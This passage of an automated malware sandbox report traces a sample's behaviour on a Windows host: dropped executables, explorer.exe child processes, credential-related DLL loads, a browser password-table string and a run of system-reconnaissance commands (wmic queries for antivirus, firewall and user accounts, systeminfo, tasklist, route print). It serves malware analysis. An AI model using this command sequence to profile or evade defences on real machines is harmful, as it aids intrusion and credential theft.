                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1584"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1612"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1660"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1688"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1700"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1820"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1836"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1936"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1944"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1952"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2024"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2096"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2152"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2188"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2204"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2240"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2392"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2400"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2440"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2484"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2492"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2528"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2588"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2596"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2628"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2768"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2868"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2932"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3260"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3512"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3696"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3756"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3984"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2456"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4132"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4800"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4572"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5152"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5932"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6708"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6792"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6836"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6960"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3584"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5864"::GetOwner
                Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2672"::GetOwner
                Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: 6D5F.tmp.9.dr, 69D1.tmp.9.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: KTh1gQlT9a.exe ReversingLabs: Detection: 34%
                Source: unknown Process created: C:\Users\user\Desktop\KTh1gQlT9a.exe "C:\Users\user\Desktop\KTh1gQlT9a.exe"
                Source: unknown Process created: C:\Users\user\AppData\Roaming\esjbbri C:\Users\user\AppData\Roaming\esjbbri
                Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\E647.exe C:\Users\user\AppData\Local\Temp\E647.exe
                Source: unknown Process created: C:\Users\user\AppData\Roaming\uejbbri C:\Users\user\AppData\Roaming\uejbbri
                Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\B575.exe C:\Users\user\AppData\Local\Temp\B575.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exe Process created: C:\Windows\System32\cmd.exe cmd
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
                Source: C:\Windows\explorer.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E647.exe C:\Users\user\AppData\Local\Temp\E647.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B575.exe C:\Users\user\AppData\Local\Temp\B575.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csvJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csvJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csvJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydnsJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route printJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show stateJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csvJump to behavior
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\esjbbriSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\esjbbriSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\esjbbriSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\esjbbriSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\E647.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\E647.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\E647.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\E647.exeSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uejbbriSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uejbbriSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uejbbriSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\uejbbriSection loaded: msvcr100.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: winscard.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: devobj.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: cryptnet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\B575.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
